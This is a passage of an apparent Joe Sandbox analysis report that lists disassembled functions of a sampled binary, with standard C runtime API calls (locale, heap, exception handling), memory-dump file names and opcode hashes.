                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 246b0e34f57f0e13d14ab90ab287206c33abb022896dc6b176531878a68630f4
                                                                                    • Instruction ID: 4c50448393d29a6866fe663ec7d7323c420cf26d7b63f15aa80f0eec2d3a7b25
                                                                                    • Opcode Fuzzy Hash: 246b0e34f57f0e13d14ab90ab287206c33abb022896dc6b176531878a68630f4
                                                                                    • Instruction Fuzzy Hash: 9CF046362283045FDF165F399C81A7A7B90EF80768F1A482DF9854B6C0C671AC02C710
                                                                                    Function 0038EE8F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038A722: EnterCriticalSection.KERNEL32(-003DAAA0,?,0038DB07,00000000,003A5540,0000000C,0038DACE,?,?,0038EE1E,?,?,0038EC9E,00000001,00000364,00000000), ref: 0038A731
                                                                                    • EnumSystemLocalesW.KERNEL32(0038EE82,00000001,003A5640,0000000C,0038F2B1,00000000), ref: 0038EEC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 4859b9b6aa595092ab9b54478259c5598fec072ebe55fe5d52c7820f96372987
                                                                                    • Instruction ID: bb55fc6d10d9c135043e0de03cf52f5e14fea218cce393f4dfcac991666f043f
                                                                                    • Opcode Fuzzy Hash: 4859b9b6aa595092ab9b54478259c5598fec072ebe55fe5d52c7820f96372987
                                                                                    • Instruction Fuzzy Hash: 37F0F972A04714DFD712EFA8E942B9D77B4EB09761F1041ABF4119B2A0CBB59940CF91
                                                                                    Function 00397159 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(003970B2,00000001,00000000,?,?,0039791D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00397190
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 41ca2bf44c925c1bd79ff4c2f63bdcf3442df26188101b8da6964fa2cdf21263
                                                                                    • Instruction ID: 703573d4712e0249073490ba63205e354c4554d1a53e9fe40d03f9dbcea130ce
                                                                                    • Opcode Fuzzy Hash: 41ca2bf44c925c1bd79ff4c2f63bdcf3442df26188101b8da6964fa2cdf21263
                                                                                    • Instruction Fuzzy Hash: BBF0E53631420557DF16AF35DC5976BBF94EFC1714F074059EA098B390C6729942C7A0
                                                                                    Function 00384F82 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00004F8E,003845F8), ref: 00384F87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 16eafcd49034a94ab1f11765bd3bbbbf8ac58c1bf5492594fde81d0414e67afe
                                                                                    • Instruction ID: 9fa10405cc7ede9694cd54339212426a41345a9aad6363b7334868301ec8c05a
                                                                                    • Opcode Fuzzy Hash: 16eafcd49034a94ab1f11765bd3bbbbf8ac58c1bf5492594fde81d0414e67afe
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 00397A7D Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 2e11c27dcb194fce729b7081af4a5ce0e829d6a310c43caee1e367f75b8da8b8
                                                                                    • Instruction ID: d9d412a6f458fb0a1d74303c3f6d3ee07b90d495cfa96653deb6bafc678f2bd2
                                                                                    • Opcode Fuzzy Hash: 2e11c27dcb194fce729b7081af4a5ce0e829d6a310c43caee1e367f75b8da8b8
                                                                                    • Instruction Fuzzy Hash: 07A00171612251CB97828F35AB1A20DBBEDAA45B91F06806AA405C6674EB3984549A01
                                                                                    Function 00396968 Relevance: .3, Instructions: 327COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 3471368781-0
                                                                                    • Opcode ID: 4e183aba974653d97937d77268b61989cc60ef072df83859d16f4461b822e889
                                                                                    • Instruction ID: 2440cda61aace36b5b271cf0a65b3e34f57b7057c533f7b220316f1d610b4919
                                                                                    • Opcode Fuzzy Hash: 4e183aba974653d97937d77268b61989cc60ef072df83859d16f4461b822e889
                                                                                    • Instruction Fuzzy Hash: FAB1F8755007028BDF36AB25CC93BB7B3E9EF44308F55456DEA83CA640EA75E981CB10
                                                                                    Function 0038208C Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382093
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0038209D
                                                                                    • int.LIBCPMT ref: 003820B4
                                                                                      • Part of subcall function 003825EC: std::_Lockit::_Lockit.LIBCPMT ref: 003825FD
                                                                                      • Part of subcall function 003825EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00382617
                                                                                    • codecvt.LIBCPMT ref: 003820D7
                                                                                    • std::_Facet_Register.LIBCPMT ref: 003820EE
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0038210E
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0038211B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2133458128-3013188374
                                                                                    • Opcode ID: 719940a5cfd024549930a1822a56b101f07f7f7f73e267adbf720eafb75f924e
                                                                                    • Instruction ID: 1cea23dc99b48c4049bb98207d429bb218f9b845c9375920340b4f35564f4f51
                                                                                    • Opcode Fuzzy Hash: 719940a5cfd024549930a1822a56b101f07f7f7f73e267adbf720eafb75f924e
                                                                                    • Instruction Fuzzy Hash: 7B0180769003199BCB0BFBA4D91A6BEB7B9BF84710F250589E410AF391CF749E058B91
                                                                                    Function 00382121 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382128
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00382132
                                                                                    • int.LIBCPMT ref: 00382149
                                                                                      • Part of subcall function 003825EC: std::_Lockit::_Lockit.LIBCPMT ref: 003825FD
                                                                                      • Part of subcall function 003825EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00382617
                                                                                    • ctype.LIBCPMT ref: 0038216C
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00382183
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003821A3
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 003821B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2958136301-3013188374
                                                                                    • Opcode ID: 8f1b1acf394f37a9f58bf4b6e3bc8c19aee228d8fc4d3efb6f08e083ff80468e
                                                                                    • Instruction ID: 5130d072a45502e973af32581da971c084ceeb7ab4f177f8b98be29069524481
                                                                                    • Opcode Fuzzy Hash: 8f1b1acf394f37a9f58bf4b6e3bc8c19aee228d8fc4d3efb6f08e083ff80468e
                                                                                    • Instruction Fuzzy Hash: 680196359003159BCB07FBA4D9156BF77B9AF84710F250089F511AF391DF749E048B85
                                                                                    Function 00387C88 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00387DA7
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00387EB5
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00388007
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00388022
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2751267872-393685449
                                                                                    • Opcode ID: 51d3103678b77fdbf0b194214cdbb103598a3a25376107f9eda3b959e3e408a6
                                                                                    • Instruction ID: cccf47233b35ec98688ac23f9cad7111f54b1ff72aa41c42b2c120c9bc6a4e28
                                                                                    • Opcode Fuzzy Hash: 51d3103678b77fdbf0b194214cdbb103598a3a25376107f9eda3b959e3e408a6
                                                                                    • Instruction Fuzzy Hash: 58B16871804309EFCF26EFA5C8819AEBBB6FF54310B2540DAE9116B212D770EA51CB91
                                                                                    Function 003916EC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3907804496
                                                                                    • Opcode ID: e33706f699a9b31a9d7f64f1fc51eea9e8d9662fc47ee23e869b076288003b7b
                                                                                    • Instruction ID: 09bbb4cdf8bc92540d1421d658ad50e766d2d70dd644bff6d17cc82c0df7ea77
                                                                                    • Opcode Fuzzy Hash: e33706f699a9b31a9d7f64f1fc51eea9e8d9662fc47ee23e869b076288003b7b
                                                                                    • Instruction Fuzzy Hash: DCB1FF71A0420BAFDF13DF98D890BAEBBB5BF45310F154199E450BB292C7749D41CBA1
                                                                                    Function 00387720 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00387757
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0038775F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003877E8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00387813
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00387868
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm$|,8
                                                                                    • API String ID: 1170836740-3459341545
                                                                                    • Opcode ID: a754dcc75935e044bf61472dddec6742d01af962377696f27b8ebf5676e2d263
                                                                                    • Instruction ID: 08675261ec1776189db7d626bdca480752f85c64478a8f0bac6665572d81ed00
                                                                                    • Opcode Fuzzy Hash: a754dcc75935e044bf61472dddec6742d01af962377696f27b8ebf5676e2d263
                                                                                    • Instruction Fuzzy Hash: DD41A434A043189BCF12EF69C885AAE7BB6FF45314F2581D5F8149B392D731DA01CB91
                                                                                    Function 00399969 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(011705D8,011705D8,?,7FFFFFFF,?,00399C39,011705D8,011705D8,?,011705D8,?,?,?,?,011705D8,?), ref: 00399A0F
                                                                                    • __alloca_probe_16.LIBCMT ref: 00399ACA
                                                                                    • __alloca_probe_16.LIBCMT ref: 00399B59
                                                                                    • __freea.LIBCMT ref: 00399BA4
                                                                                    • __freea.LIBCMT ref: 00399BAA
                                                                                    • __freea.LIBCMT ref: 00399BE0
                                                                                    • __freea.LIBCMT ref: 00399BE6
                                                                                    • __freea.LIBCMT ref: 00399BF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: a6f8deeed8299ea9d58b3099d80fcaf4a0427885a853ec8c72d9c928b7b5086b
                                                                                    • Instruction ID: 66bff38d1bf8c54de72eb2f4be164f0d06212c96f3db39d59e6da9f111d90590
                                                                                    • Opcode Fuzzy Hash: a6f8deeed8299ea9d58b3099d80fcaf4a0427885a853ec8c72d9c928b7b5086b
                                                                                    • Instruction Fuzzy Hash: 7671A8729042166BDF23AAAC9C82FAE77B9DF45310F26009FE915BB281E735DD408761
                                                                                    Function 00384356 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0038439F
                                                                                    • __alloca_probe_16.LIBCMT ref: 003843CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0038440A
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00384427
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00384466
                                                                                    • __alloca_probe_16.LIBCMT ref: 00384483
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003844C5
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003844E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                    • String ID:
                                                                                    • API String ID: 2040435927-0
                                                                                    • Opcode ID: 07db98db00aa7d958d2a9309c4636f9839861cca6280839391533d6045e40a57
                                                                                    • Instruction ID: 41a3f1d20554b425017529e5f614585c93f7534d98067068e64a2cf47faa8245
                                                                                    • Opcode Fuzzy Hash: 07db98db00aa7d958d2a9309c4636f9839861cca6280839391533d6045e40a57
                                                                                    • Instruction Fuzzy Hash: 6D51AB76500317ABEF22AF61DC45FAF7BA9EB41750F1640A9F900AB950E771CC10CB60
                                                                                    Function 00383C8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00383C92
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00383C9D
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00383D0B
                                                                                      • Part of subcall function 00383DEE: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00383E06
                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00383CB8
                                                                                    • _Yarn.LIBCPMT ref: 00383CCE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                    • String ID: |,8
                                                                                    • API String ID: 1088826258-3013188374
                                                                                    • Opcode ID: f14a85db42c0023476a167a4ba73c3c326cd8f4fcdc4ee3a8d94a0ee4956162b
                                                                                    • Instruction ID: ff7ff924b3fad0a7f35ff15b2b69655004d82fa184da3ec77ce1a905b9cba943
                                                                                    • Opcode Fuzzy Hash: f14a85db42c0023476a167a4ba73c3c326cd8f4fcdc4ee3a8d94a0ee4956162b
                                                                                    • Instruction Fuzzy Hash: 5C018476A017119BCB0BFB20E95557D7B75BF85B40B154089E8115F391CF746F02CB85
                                                                                    Function 0038C1EF Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,ECD46234,?,?,00000000,0039B1C6,000000FF,?,0038C17F,?,?,0038C153,00000016), ref: 0038C224
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038C236
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,0039B1C6,000000FF,?,0038C17F,?,?,0038C153,00000016), ref: 0038C258
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll$|,8
                                                                                    • API String ID: 4061214504-3487481140
                                                                                    • Opcode ID: 44c146544b76ed0dcb16775b41a15a20deac64a510655712f557c082454a3e29
                                                                                    • Instruction ID: dafc4df579b991326d6be829271157574fd9e8067bbdbe747e30fcc9744ad759
                                                                                    • Opcode Fuzzy Hash: 44c146544b76ed0dcb16775b41a15a20deac64a510655712f557c082454a3e29
                                                                                    • Instruction Fuzzy Hash: FE016232914629AFDF139F94DD0ABEEBBBCFB44B14F010926E811E22D0DB759900CB90
                                                                                    Function 0038791A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00387911,00385ABF,00384FD2), ref: 00387928
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00387936
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0038794F
